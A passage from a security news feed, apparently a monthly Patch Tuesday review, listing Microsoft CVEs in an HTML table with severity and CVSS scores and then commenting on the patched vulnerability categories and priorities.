  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50298"><span>CVE-2026-50298</span></a></td>
  <td width="256" class="xl74">Windows Spaceport.sys
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49171"><span>CVE-2026-49171</span></a></td>
  <td width="256" class="xl74">Windows Speech Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49170"><span>CVE-2026-49170</span></a></td>
  <td width="256" class="xl74">Windows
  StateRepository API Server file Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58526"><span>CVE-2026-58526</span></a></td>
  <td width="256" class="xl74">Windows Storage
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50299"><span>CVE-2026-50299</span></a></td>
  <td width="256" class="xl74">Windows Storage Spaces
  Direct Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57968"><span>CVE-2026-57968</span></a></td>
  <td width="256" class="xl74">Windows Subsystem for
  Linux (WSL2) Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57973"><span>CVE-2026-57973</span></a></td>
  <td width="256" class="xl74">Windows Subsystem for
  Linux (WSL2) Kernel Tampering Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50418"><span>CVE-2026-50418</span></a></td>
  <td width="256" class="xl74">Windows System Secure
  Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50306"><span>CVE-2026-50306</span></a></td>
  <td width="256" class="xl74">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50307"><span>CVE-2026-50307</span></a></td>
  <td width="256" class="xl74">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49177"><span>CVE-2026-49177</span></a></td>
  <td width="256" class="xl74">Windows TCP/IP
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50669"><span>CVE-2026-50669</span></a></td>
  <td width="256" class="xl74">Windows Telephony
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54124"><span>CVE-2026-54124</span></a></td>
  <td width="256" class="xl74">Windows Terminal
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50350"><span>CVE-2026-50350</span></a></td>
  <td width="256" class="xl74">Windows Trusted
  Runtime Interface Driver Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50326"><span>CVE-2026-50326</span></a></td>
  <td width="256" class="xl74">Windows Unified
  Consent System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49790"><span>CVE-2026-49790</span></a></td>
  <td width="256" class="xl74">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50498"><span>CVE-2026-50498</span></a></td>
  <td width="256" class="xl74">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58547"><span>CVE-2026-58547</span></a></td>
  <td width="256" class="xl74">Windows Universal Plug
  and Play (UPnP) Device Host Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49794"><span>CVE-2026-49794</span></a></td>
  <td width="256" class="xl74">Windows USB Audio
  Class Driver Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50453"><span>CVE-2026-50453</span></a></td>
  <td width="256" class="xl74">Windows USB Audio
  Class Driver Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58528"><span>CVE-2026-58528</span></a></td>
  <td width="256" class="xl74">Windows USB Audio
  Class Driver Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50321"><span>CVE-2026-50321</span></a></td>
  <td width="256" class="xl74">Windows USB Driver
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50479"><span>CVE-2026-50479</span></a></td>
  <td width="256" class="xl74">Windows USB Hub Driver
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55000"><span>CVE-2026-55000</span></a></td>
  <td width="256" class="xl74">Windows USB Print
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54991"><span>CVE-2026-54991</span></a></td>
  <td width="256" class="xl74">Windows USB Print
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54996"><span>CVE-2026-54996</span></a></td>
  <td width="256" class="xl74">Windows USB Print
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49802"><span>CVE-2026-49802</span></a></td>
  <td width="256" class="xl74">Windows USB Print
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49806"><span>CVE-2026-49806</span></a></td>
  <td width="256" class="xl74">Windows USB Print
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50674"><span>CVE-2026-50674</span></a></td>
  <td width="256" class="xl74">Windows USB Print
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49804"><span>CVE-2026-49804</span></a></td>
  <td width="256" class="xl74">Windows USB Video
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50454"><span>CVE-2026-50454</span></a></td>
  <td width="256" class="xl74">Windows User Interface
  Core Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49176"><span>CVE-2026-49176</span></a></td>
  <td width="256" class="xl74">Windows WalletService
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49800"><span>CVE-2026-49800</span></a></td>
  <td width="256" class="xl74">Windows Web Proxy
  Auto-Discovery Protocol (WPAD) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50480"><span>CVE-2026-50480</span></a></td>
  <td width="256" class="xl74">Windows Web Proxy
  Auto-Discovery Protocol (WPAD) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56173"><span>CVE-2026-56173</span></a></td>
  <td width="256" class="xl74">Windows WebView
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58632"><span>CVE-2026-58632</span></a></td>
  <td width="256" class="xl74">Windows Win32 Kernel
  Subsystem Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54107"><span>CVE-2026-54107</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54986"><span>CVE-2026-54986</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54112"><span>CVE-2026-54112</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54114"><span>CVE-2026-54114</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50670"><span>CVE-2026-50670</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50688"><span>CVE-2026-50688</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50687"><span>CVE-2026-50687</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56176"><span>CVE-2026-56176</span></a></td>
  <td width="256" class="xl74">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58628"><span>CVE-2026-58628</span></a></td>
  <td width="256" class="xl74">Windows Wireless
  Network Manager Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50295"><span>CVE-2026-50295</span></a></td>
  <td width="256" class="xl74">Windows Zero Trust DNS
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50509"><span>CVE-2026-50509</span></a></td>
  <td width="256" class="xl74">Wireless Wide Area
  Network Service (WwanSvc) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55945"><span>CVE-2026-55945</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Information Disclosure Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">4.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45488"><span>CVE-2026-45488</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">5.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45489"><span>CVE-2026-45489</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55145"><span>CVE-2026-55145</span></a></td>
  <td width="256" class="xl74">Outlook Copilot
  Tampering Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">6.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56181"><span>CVE-2026-56181</span></a></td>
  <td width="256" class="xl74">Windows Network
  Address Translation (NAT) Spoofing Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58597"><span>CVE-2026-58597</span></a></td>
  <td width="256" class="xl74">Microsoft
  Edge (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl73">Low</td>
  <td class="xl69">4.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>** Indicates this CVEs has already been resolved by Microsoft, and no further action is needed by the end user.</em></p><p class=""><em> </em></p><p class=""><em> </em></p><p class="">I’ll do my best to summarize everything else in this release, but no promises. I’m only human after all.</p><p class=""> </p><p class="">Looking at the remaining Critical-rated patches, Office is its own weather system: fourteen Word/Excel/PowerPoint/Office RCEs clustered at CVSS 7.8, plus five Windows Media Foundation RCEs. Outside of the Preview Pane attack vector, they are individually unremarkable; collectively, patch Office and reboot. Always reboot. We’ve already mentioned DHCP some, but DHCP Server can't catch a break. Beyond the one already covered, add CVE-2026-56159, CVE-2026-48564, CVE-2026-50370, and DHCP Client cousin CVE-2026-54128. Five DHCP RCEs in one release. Rounding things out, Print Spooler (CVE-2026-58608), Windows TCP/IP (CVE-2026-54999), and a SQL Server RCE pair (CVE-2026-54117/54118) all receive patches, and all are rated a CVSS 8.8. VE-2026-55944 (Dynamics NAV/Business Central On-Prem RCE, 9.8) is the same deserialization flavor as the SharePoint pair; it’s unauthenticated, network-reachable, and easy to overlook since it's not SharePoint. CVE-2026-48561 (Microsoft Copilot RCE, 9.6) and CVE-2026-50380 (Windows GDI+ RCE, 9.6) round out the near-top tier. Don't forget CVE-2026-55040, a SharePoint Security Feature Bypass (9.1) — patch it in the same pass as the SharePoint RCE pair since it's the same product family. Identity and infrastructure get hit too: CVE-2026-54121 (AD Certificate Services EoP, 8.8) and CVE-2026-50444 (WSUS EoP, 8.8). The obscure Reliable Multicast Transport Driver (RMCAST) takes two RCEs (CVE-2026-54982, CVE-2026-54995), and CVE-2026-50474 gives Remote Desktop Client its own RCE, separate from the RDP one already covered. The rest is a long tail: Defender RCE x2, GDI+ again, Windows Media x2, Secure Kernel Mode EoP x2, and a second Hyper-V EoP. You can consider these “normal” as far as patch cadence goes.</p><p class="">That leaves us with 95 RCE to discuss. I would explain, but there is too much, so let me sum up. CVE-2026-55944 (Dynamics NAV/Business Central On-Prem, 9.8) is the same deserialization flavor as the SharePoint pair: unauthenticated, easy to miss since it's not SharePoint. CVE-2026-54990 (Remote Desktop Client), CVE-2026-49172 (Windows FTP Service), and CVE-2026-50447 (MSMQ) all hit 9.8 too, proof severity labels lag CVSS sometimes. CVE-2026-48561 (Copilot) and CVE-2026-50380 (GDI+) sit at 9.6.</p><p class="">The pattern worth watching: 14 Windows NTFS and 7 ReFS RCEs/ That makes 21 filesystem-driver bugs, an unusually large cluster suggesting a shared root cause. Microsoft Edge (Chromium-based) contributes 21 more that are genuinely Microsoft's to patch, not Chromium re-listing noise. Remote Desktop Client racks up a second and third RCE (CVE-2026-50474, CVE-2026-58594), and Windows Admin Center picks up two (CVE-2026-56196/56197) — WAC exposure keeps creeping into these releases. Exchange Server (CVE-2026-55005) and AD Domain Services (CVE-2026-49178) both land at 8.8.</p><p class="">And because this release wouldn't be complete without it: CVE-2026-50663, an RCE in Age of Empires II: Definitive Edition. Yes, really. Patch your civilization anyway.</p><p class="">There are close to 260 EoP bugs in this month’s release. Microsoft could have just published the EoPs and still had a record-setting month. As usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. What’s really frustrating is that 94 have no explicit privilege statement at all. Microsoft just says “elevate privileges” with no detail. By my count, that leaves around 25 bugs to consider. Some don’t elevate at all. The FAQ literally says the attacker just gets “the rights of the user running the affected application.” That covers Win32k, Clip Service, Search Service, MSMQ, and SharePoint. A few get a Low-to-Medium integrity bump. There are also a couple that lead to downgraded service accounts or arbitrary file deletion, but nothing else I’ve seen really stands out too much.</p><p class="">There are 20 Security Feature Bypass (SFB) bugs this month, and it's a genuinely mixed bag. CVE-2026-55040 leads at Critical, CVSS 9.1 as it’s weak authentication in SharePoint Server. Patch it in the same pass as the SharePoint RCE pair since it's the same product. The AI-coding-tool trend continues: GitHub Copilot and Visual Studio Code and Visual Studio all land SFB bugs, mostly injection or path-traversal flavored. BitLocker is this month's lone publicly disclosed bug. It’s not exploited yet, but public disclosure is a countdown clock, not a free pass. It requires physical access, as does the bug in Microsoft XML. The firmware/boot cluster is worth a second look: Secure Boot, Boot Loader, and Key Guard all touch the trust chain below the OS. Meaning, despite a low CVSS score, “if this fails, nothing above it can be trusted” stakes. Rounding out the SFB patches, there are two .NET SFBs, two Windows Kernel SFBs, and a DNS/Cryptographic Services bringing up the rear.</p><p class="">The July release includes 31Spoofing bugs this month, and we’ve already covered the most important (Exchange). SharePoint Server accounts for another ten with almost all the same root cause: stored XSS letting an authenticated attacker spoof content in the browser. Microsoft Edge (Chromium-based) contributes fifteen more spanning access-control failures, SSRF, type confusion, and UI misrepresentation. All genuinely Microsoft's to patch, not re-listed Chromium noise. The remaining six round out the usual suspects: a Windows NAT spoofing bug reachable from an adjacent network, a Bing app flaw on iOS, a PowerBI Report Server XSS issue, a .NET output-encoding bug, and an AD FS spoofing flaw. None publicly disclosed, none exploited, but with SharePoint's history this year, don't let "just Spoofing" lull you into deprioritizing the patch cycle.</p><p class="">Of 111 Information Disclosure bugs, the overwhelming majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. GitHub Copilot is the standout. Here, the bug insufficiently protected credentials, meaning actual secrets leak, not memory scraps. The Windows Admin Center flaw discloses data via improper authentication. A management console leaking to an unauthorized party is a bigger deal than it sounds. SharePoint uses SSRF to pull data server-side, and the Event Logging Service is a protection-mechanism failure, not a memory bug at all. Edge picks up three genuinely file-system-flavored disclosures — improper authorization, files/directories accessible to external parties, and link-following — plus Edge for Android exposing “private personal information” twice and two path-traversal bugs. The remaining 40+ are mostly one-line “exposure of sensitive information to an unauthorized actor” entries scattered across File Explorer, Push Notifications, Cryptographic Services, and Win32k.</p><p class="">Only 8 Tampering bugs this month, the smallest bucket, but a couple stand out. The top of the list is a WSUS bug, caused by an uncaught exception that lets an unauthenticated attacker tamper with the update service over the network. That’s your patch-management infrastructure itself being the target, which always deserves extra attention. Windows CNG (the crypto API) picks up a missing-cryptographic-step flaw, and Windows DNS Client shows up three separate times across the list, twice for improper access control and once for missing authentication on a critical function. DNS resolution having this many tampering paths in one release is worth flagging as a pattern rather than three unrelated bugs. The one genuinely different entry is Outlook Copilot, described simply as vulnerable to “malicious uses” enabling tampering over the network. That’s a fantastically vague phrasing for an AI-assistant feature, continuing this year's running theme of Copilot-branded features showing up somewhere in every release. Finally, a .NET link-following bug and a WSL2 kernel race condition receive patches. Both require local/authorized access to trigger.</p><p class="">Still with me? Good, because we have 35 DoS bugs to cover, and this is really an identity-infrastructure story more than a grab-bag. Active Directory Federation Services alone accounts for seven of them, all sitting at CVSS 7.5, all stack-based buffer overflows or infinite loops that let an unauthenticated attacker knock the service over the network.  The .NET ecosystem is the other big cluster: .NET, .NET Framework, and ASP.NET Core/OData contribute nine bugs combined, almost all “allocation of resources without limits or throttling”.  HTTP.sys and HTTP/2 pick up the same flavor. LSASS shows up twice, which is always worth a second look given what that process actually holds. Rounding out the list are patches for Windows DHCP Server, SMB Server, Secure Channel, Hyper-V, and IKE Protocol each take a single hit, mostly requiring authorized or adjacent-network access rather than being wide open to the internet.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">The next Patch Tuesday will be on August 11, just after Hacker Summer Camp in sunny Las Vegas. Should I survive the heat, I’ll be back then to give you my full thoughts on the release – no matter how large it may be. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The February 2026 Security Update Review]]></title>
<description><![CDATA[I have survived the biggest Pwn2Own ever, but I’m back in Tokyo for the second Patch Tuesday of 2026. My location never stops Patch Tuesday from coming, so let’s take a look at the latest security patches from Adobe and Microsoft.  If you’d rather watch the full video recap covering the entire re...]]></description>
<link>https://tsecurity.de/de/3694474/it-security-nachrichten/the-february-2026-security-update-review/</link>
